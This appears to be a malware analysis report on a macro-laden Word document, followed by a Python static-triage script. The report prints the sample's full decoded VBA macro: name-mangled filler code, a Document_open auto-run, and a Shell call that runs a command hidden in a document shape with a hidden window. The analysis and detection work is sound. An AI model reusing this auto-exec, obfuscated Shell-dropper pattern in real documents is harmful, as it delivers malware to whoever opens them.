Verdict: MALICIOUS
Risk score: 232
Heuristics: 8

- ClamAV detection [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6749156-0.
- VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL). Matched lines in script:

      End If
      KOmqGGHWQO = Shell(tvAmfcY + cdjTt + Xjsiu, vVhGli)
      If (JbaECUOVq <> 0 Or OkUtdDz) Then

  The command string is not written in the macro: tvAmfcY is read from a document shape (Shapes(...).TextFrame.ContainingRange), so the command only becomes visible when the shape text is extracted from the document body. The window-style argument vVhGli is declared as Const vVhGli = 581112820 - 581112820, i.e. 0 (vbHide), so the spawned process runs with a hidden window.
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] (OLE_VBA_DOCOPEN). Matched lines in script:

      End Function
      Private Sub Document_open()
      If (nmIplEaNb <> 0 Or fKiGS) Then

  Document_open runs as soon as macros are enabled; it calls HkjjRPvmBIJ, the function that contains the Shell call above.
- Reference to PowerShell [high] (SC_STR_POWERSHELL): a PowerShell reference was found in the sample. The string does not appear in the decoded macro preview below.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

      URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

  This is the standard DrawingML XML namespace URI present in ordinary Office documents, not a host the sample contacts.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8933 bytes |

SHA-256: 1475beffdafa01735b275d477eb922c6b4ba133dacee1838bebeb5dc37a05510

Detection on the extracted file:

- ClamAV: No threats found. The Doc.Malware.Generic-6749156-0 hit above was raised on the document itself; the decoded macro source on its own does not match that signature.
- Obfuscation or payload: likely. 109 of 173 identifiers look randomly generated (e.g. 'HkjjRPvmBIJ'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "wJvMhzXa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function HkjjRPvmBIJ()
Const vVhGli = 581112820 - 581112820
If (EzrLAwDoN <> 0 Or qfjYliKnJ) Then
qfjYliKnJ = True
HiPNmHh = HiPNmHh & YMGoS = EhwRMj / 49323024
If (EzrLAwDoN = 1) Then
HiPNmHh = HiPNmHh & LYozdC = 502363349 + njXIHI
HiPNmHh = HiPNmHh & WjiZtQ = QApCMn / 456287435
HiPNmHh = HiPNmHh & Ejsad = 228746119 / wKaNIE
Else
HiPNmHh = HiPNmHh & dopwh = 161665154 - EizTs
HiPNmHh = HiPNmHh & PuvXz = QOGjDf - dMsLJR
HiPNmHh = HiPNmHh & pKJbL = UCjmHM - HOBBnb
End If
End If
If (pqsCEnnmi <> 0 Or umwZwYvH) Then
umwZwYvH = True
NPwHXGzp = NPwHXGzp & OiqnuP = 107743896 * 227789779
If (pqsCEnnmi = 1) Then
NPwHXGzp = NPwHXGzp & WQwLBr = 251102959 + 475440407
NPwHXGzp = NPwHXGzp & jljFLd = uimsEh * 325471801
NPwHXGzp = NPwHXGzp & jVwFzD = 384764880 / 488416554
Else
NPwHXGzp = NPwHXGzp & AvGrj = bIzwjV + 524635025
NPwHXGzp = NPwHXGzp & RVnBoM = UADvq * pnuBFE
NPwHXGzp = NPwHXGzp & IjqdNi = AlkqJj - YOhvQ
End If
End If
tvAmfcY = Shapes(zulJQDzM + CcdElTLI + 1 + fUcqfa + rYiBY).TextFrame.ContainingRange + OqBaQ + PSKXdJ
If (uIzUcAjvs <> 0 Or WkcptkKKP) Then
WkcptkKKP = True
FiiBAYc = FiiBAYc & mDiUhA = sHwjH * 11826755
If (uIzUcAjvs = 1) Then
FiiBAYc = FiiBAYc & CmaYl = 42984290 - 324745594
FiiBAYc = FiiBAYc & uvdHc = 435285865 * zsQaw
FiiBAYc = FiiBAYc & DXDJo = 394453502 * 475112496
Else
FiiBAYc = FiiBAYc & BCbPA = 279080644 - 364135682
FiiBAYc = FiiBAYc & NiIGCr = 162513903 + 438938860
FiiBAYc = FiiBAYc & dPEih = 36939747 + wBzjH
End If
End If
If (bSmcKfRu <> 0 Or ponVzGA) Then
ponVzGA = True
iuWcK = iuWcK & MKIEJj = zFtJz * 436540278
If (bSmcKfRu = 1) Then
iuWcK = iuWcK & Ovpiw = XlbQCS + KTwPu
iuWcK = iuWcK & RkaSC = INWrjt + AqlHp
iuWcK = iuWcK & Zjnwk = GmwWoz - 327966370
Else
iuWcK = iuWcK & zFjfod = 449240677 * DoiAts
iuWcK = iuWcK & qRWYM = 452886872 * 290952064
iuWcK = iuWcK & zVXdn = 234381136 / YvpLri
End If
End If
If (tGUKzdCMk <> 0 Or mDsWPUawc) Then
mDsWPUawc = True
qihCswFqN = qihCswFqN & rSBwdk = 306210077 - 268195322
If (tGUKzdCMk = 1) Then
qihCswFqN = qihCswFqN & LaiGnk = rjzBjU + tGCDPZ
qihCswFqN = qihCswFqN & SzYLw = GTCts - YOXtjC
qihCswFqN = qihCswFqN & HKIBDK = 103435451 / rzMwvN
Else
qihCswFqN = qihCswFqN & dtaKu = bTXhDJ / vWVMS
qihCswFqN = qihCswFqN & VRHJw = BERIH - 451735700
qihCswFqN = qihCswFqN & wiTuV = jpNSnn + 299991164
End If
End If
KOmqGGHWQO = Shell(tvAmfcY + cdjTt + Xjsiu, vVhGli)
If (JbaECUOVq <> 0 Or OkUtdDz) Then
OkUtdDz = True
YBWLSJ = YBWLSJ & RAsukT = jUPQh * RGwqlu
If (JbaECUOVq = 1) Then
YBWLSJ = YBWLSJ & iLZlPp = hiSwI - YlUVb
YBWLSJ = YBWLSJ & EvAAi = 494161176 / WQsSD
YBWLSJ = YBWLSJ & ZXLBFa = fuzlB - QIQKj
Else
YBWLSJ = YBWLSJ & cPfqCd = 16348497 / uYtZa
YBWLSJ = YBWLSJ & fmYkF = ftOwL - KzwNE
YBWLSJ = YBWLSJ & FMhbR = 112595558 / hJYufi
End If
End If
If (wOrqYSSEw <> 0 Or VAsNDSUG) Then
VAsNDSUG = True
RlBYnJtw = RlBYnJtw & jMDmH = DisRl - 173808310
If (wOrqYSSEw = 1) Then
RlBYnJtw = RlBYnJtw & sYiuzs = 389864908 - zTQYY
RlBYnJtw = RlBYnJtw & iIzqE = 507667841 - 28594441
RlBYnJtw = RlBYnJtw & iVMYml = tqKVaC - kZMWd
Else
RlBYnJtw = RlBYnJtw & QnzmPo = 430289160 + aYtGso
RlBYnJtw = RlBYnJtw & GdfzsJ = zPnwq * 416329321
RlBYnJtw = RlBYnJtw & DbJva = 420035748 + 420493761
End If
End If
If (QrWaIw <> 0 Or IUwEc) Then
IUwEc = True
ROGuNiUb = ROGuNiUb & XMoZR = zPzffZ + OGFru
If (QrWaIw = 1) Then
ROGuNiUb = ROGuNiUb & GiTiV = 154039459 * FoUPi
ROGuNiUb = ROGuNiUb & snzTJl = 429282580 / 452879713
ROGuNiUb = ROGuNiUb & jdIFzY = 188577361 + MwAAoW
Else
ROGuNiUb = ROGuNiUb & QVmEdS = MnizO + 114197937
ROGuNiUb = ROGuNiUb & nlVvzT = OazYU * YrIoU
ROGuNiUb = ROGuNiUb & MMbSMO = TOTpdF + 322340083
End If
End If
If (ZXWOsX <> 0 Or oArNTT) Then
oArNTT = True
siMjUnUO = siMjUnUO & DVdDww = 95958160 * 325558467
If (ZXWOsX = 1) Then
siMjUnUO = siMjUnUO & OjKqfm = 513624474 - 132932200
siMjUnUO = siMjUnUO & kVhuRL = NzavRt / wOwALq
siMjUnUO = siMjUnUO & tOUOp = dhIdG / AcLnt
Else
siMjUnUO = siMjUnUO & CrqXD = iEDPS / 59745003
siMjUnUO = siMjUnUO & qUwLq = MfbvM + ozoMtF
siMjUnUO = siMjUnUO & bEzIwb = LMklM * 37015419
End If
End If
End Function
Private Sub Document_open()
If (nmIplEaNb <> 0 Or fKiGS) Then
fKiGS = True
LwcrHs = LwcrHs & wjVvz = 295986468 + 182296735
If (nmIplEaNb = 1) Then
LwcrHs = LwcrHs & qjzQsK = 224222510 * DDTiA
LwcrHs = LwcrHs & WBTRnF = 198687904 - 362085556
LwcrHs = LwcrHs & RZNmYp = 53148710 / 477558833
Else
LwcrHs = LwcrHs & aKGQIa = kXhtq / 169701047
LwcrHs = LwcrHs & QOIitq = VJiRi * FiRVLs
LwcrHs = LwcrHs & PbtzD = Zalil - 255211725
End If
End If
If (IiDRjshaZ <> 0 Or foiSVm) Then
foiSVm = True
BVAnjo = BVAnjo & LaTQo = fstlhb * 118708661
If (IiDRjshaZ = 1) Then
BVAnjo = BVAnjo & AmTLcq = 4022393 / 87448500
BVAnjo = BVAnjo & OIVHE = SdQYIb / 336543213
BVAnjo = BVAnjo & iGIYQl = lmvwkt / TPBpL
Else
BVAnjo = BVAnjo & dGCFMM = RCcUd + 95810089
BVAnjo = BVAnjo & lsudu = qBYbMZ - KbwNO
BVAnjo = BVAnjo & zlLbDD = 280276657 * 87618199
End If
End If
HkjjRPvmBIJ
If (jGdEUo <> 0 Or AmtMd) Then
AmtMd = True
HYBXqwhNH = HYBXqwhNH & wUfTBJ = pKWhJ * 47345708
If (jGdEUo = 1) Then
HYBXqwhNH = HYBXqwhNH & QKtqB = ZhBAw / zbbLzv
HYBXqwhNH = HYBXqwhNH & YVfjp = BqRDC + LzTkM
HYBXqwhNH = HYBXqwhNH & GfCiDw = 23194834 + 447337873
Else
HYBXqwhNH = HYBXqwhNH & jaEht = Nacljl * 317359557
HYBXqwhNH = HYBXqwhNH & EVzUHd = tnuiqO / 146543904
HYBXqwhNH = HYBXqwhNH & qPDpR = 374399508 + QJtzIX
End If
End If
If (WjKaTiIT <> 0 Or mHuUpFf) Then
mHuUpFf = True
fpBYToNlj = fpBYToNlj & ZRqai = 473393776 / 242045561
If (WjKaTiIT = 1) Then
fpBYToNlj = fpBYToNlj & FioRmG = CIZbHo - 458616001
fpBYToNlj = fpBYToNlj & vGwNXW = 34666022 - MDvwo
fpBYToNlj = fpBYToNlj & KiCiLZ = PLQND - 352477672
Else
fpBYToNlj = fpBYToNlj & zwQuN = 104483240 / zDZTU
fpBYToNlj = fpBYToNlj & CLltat = zThUG * 88645439
fpBYToNlj = fpBYToNlj & PhiNkp = JzYFvJ - 145993143
End If
End If
If (rjlOhFJNT <> 0 Or kXsFGQd) Then
kXsFGQd = True
DzYOq = DzYOq & ilTFmj = 348240897 + RLfGjw
If (rjlOhFJNT = 1) Then
DzYOq = DzYOq & YkGUP = zSqErI + lFkRcs
DzYOq = DzYOq & kwmEam = 209891006 * 64573101
DzYOq = DzYOq & TLMzW = 367634309 + 358431335
Else
DzYOq = DzYOq & XlTrE = zpLuPN * 131621468
DzYOq = DzYOq & FLLaOi = 272404642 + 523637406
DzYOq = DzYOq & AVcwBt = 507053580 + 165516450
End If
End If
If (jjMjzmsk <> 0 Or haazasfa) Then
haazasfa = True
fOXKZvRCK = fOXKZvRCK & bCLkDL = Eiurb + 376732501
If (jjMjzmsk = 1) Then
fOXKZvRCK = fOXKZvRCK & FjVOr = qQNXRs * RVKQS
fOXKZvRCK = fOXKZvRCK & czIiWq = 431827869 - mMozf
fOXKZvRCK = fOXKZvRCK & EsRbDh = 187191113 * 463489577
Else
fOXKZvRCK = fOXKZvRCK & RUiOi = 86021456 / 218752483
fOXKZvRCK = fOXKZvRCK & srtsuR = 202384136 + 117939640
fOXKZvRCK = fOXKZvRCK & vwYwFw = 412774026 - 369674298
End If
End If
End Sub
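The checks the report applied to macros.bas can be reproduced over the decoded source. The Python below is an added example, not the analyzer's own code: it finds the auto-exec entry point, the Shell token and the random-identifier ratio the report flags, and adds two checks of its own, where the Shell command string is fetched from (the Shapes(...).TextFrame read) and what the Shell window-style argument folds to. The regexes, the vowel/camel-hump randomness heuristic and its thresholds are this example's assumptions, and the input is a constructed excerpt of the macro shown above.

```python
"""Static triage of decoded VBA macro source (added example, not the analyzer's code).

Reproduces the report's auto-exec, Shell-token and random-identifier checks and
adds two of its own: where the Shell command comes from, and the Shell window
style. All patterns and thresholds here are assumptions, not the analyzer's rules.
"""
import re
from dataclasses import dataclass, field

# Constructed input: a trimmed excerpt of the macro shown in the report preview.
SAMPLE_VBA = '''Attribute VB_Name = "wJvMhzXa"
Function HkjjRPvmBIJ()
Const vVhGli = 581112820 - 581112820
If (EzrLAwDoN <> 0 Or qfjYliKnJ) Then
qfjYliKnJ = True
HiPNmHh = HiPNmHh & YMGoS = EhwRMj / 49323024
End If
tvAmfcY = Shapes(zulJQDzM + CcdElTLI + 1 + fUcqfa + rYiBY).TextFrame.ContainingRange + OqBaQ + PSKXdJ
KOmqGGHWQO = Shell(tvAmfcY + cdjTt + Xjsiu, vVhGli)
End Function
Private Sub Document_open()
HkjjRPvmBIJ
End Sub
'''

# Never scored as obfuscated names: VBA keywords and the object-model members used here.
VBA_KEYWORDS = {
    "attribute", "function", "sub", "end", "if", "then", "else", "elseif", "or", "and",
    "not", "const", "private", "public", "dim", "as", "true", "false", "set", "call",
    "shapes", "textframe", "containingrange", "shell", "createobject", "getobject",
    "document_open", "autoopen", "workbook_open",
}
AUTOEXEC_RE = re.compile(
    r"\b(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(Document_Open|Document_Close|"
    r"Document_New|AutoOpen|AutoClose|AutoExec|Workbook_Open|Auto_Open)\b", re.I)
EXEC_RE = re.compile(r"\b(Shell|CreateObject|GetObject|ShellExecute|WScript\.Shell)\b", re.I)
# Command text fetched from the document body rather than the macro (example's own check).
BODY_SOURCE_RE = re.compile(
    r"(Shapes\s*\(|\.TextFrame\b|\.ContainingRange\b|ActiveDocument\.Content\b|\.Variables\b)", re.I)
CONST_RE = re.compile(r"\bConst\s+(\w+)\s*=\s*(\d+)\s*([-+*])\s*(\d+)", re.I)
SHELL_CALL_RE = re.compile(r"\bShell\s*\(.*,\s*(\w+)\s*\)", re.I)  # last arg = window style
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
STRING_RE = re.compile(r'"[^"\n]*"')


@dataclass
class TriageResult:
    autoexec: list = field(default_factory=list)             # auto-run entry points
    exec_tokens: list = field(default_factory=list)          # execution primitives
    body_sources: list = field(default_factory=list)         # payload read from document body
    shell_window_styles: list = field(default_factory=list)  # folded Shell 2nd arg; 0 == vbHide
    identifiers: set = field(default_factory=set)
    random_identifiers: set = field(default_factory=set)

    @property
    def random_ratio(self) -> float:
        return len(self.random_identifiers) / len(self.identifiers) if self.identifiers else 0.0

    @property
    def suspicious(self) -> bool:
        # Auto-exec plus an execution token mirrors the report's rule; the 0.5 ratio is an assumption.
        return bool(self.autoexec and self.exec_tokens) or self.random_ratio > 0.5


def looks_random(name: str) -> bool:
    """Name-mangling heuristic: under 25% vowels, or 3+ camelCase humps, in 5+ letters."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    vowels = sum(c in "aeiouAEIOU" for c in letters)
    humps = sum(1 for a, b in zip(letters, letters[1:]) if a.islower() and b.isupper())
    return vowels / len(letters) < 0.25 or humps >= 3


def resolve_int_consts(code: str) -> dict:
    """Fold `Const x = a <op> b` with integer operands, e.g. 581112820 - 581112820 -> 0."""
    ops = {"-": lambda a, b: a - b, "+": lambda a, b: a + b, "*": lambda a, b: a * b}
    return {name: ops[op](int(a), int(b)) for name, a, op, b in CONST_RE.findall(code)}


def triage(vba_source: str) -> TriageResult:
    r = TriageResult()
    code = STRING_RE.sub('""', vba_source)  # string literal contents are not identifiers
    r.autoexec = [m.group(1) for m in AUTOEXEC_RE.finditer(code)]
    r.exec_tokens = sorted({m.group(1) for m in EXEC_RE.finditer(code)})
    r.body_sources = sorted({m.group(1) for m in BODY_SOURCE_RE.finditer(code)})
    consts = resolve_int_consts(code)
    for m in SHELL_CALL_RE.finditer(code):
        arg = m.group(1)
        r.shell_window_styles.append(int(arg) if arg.isdigit() else consts.get(arg))
    for ident in IDENT_RE.findall(code):
        low = ident.lower()
        if low in VBA_KEYWORDS or low.startswith("vb_"):
            continue
        r.identifiers.add(ident)
        if looks_random(ident):
            r.random_identifiers.add(ident)
    return r


if __name__ == "__main__":
    res = triage(SAMPLE_VBA)
    print("auto-exec:", res.autoexec, "exec:", res.exec_tokens, "from body:", res.body_sources)
    print("Shell window style:", res.shell_window_styles, "(0 is vbHide)")
    print(f"random identifiers: {len(res.random_identifiers)}/{len(res.identifiers)}"
          f" ({res.random_ratio:.0%}); suspicious={res.suspicious}")
```

Two points the run makes that the finding list only implies: the Shell argument resolves to a hidden window, and the command itself is absent from the source, so a triage that stops at the decoded macro never sees the PowerShell string the SC_STR_POWERSHELL rule matched elsewhere in the sample; the shape text has to be carved as well.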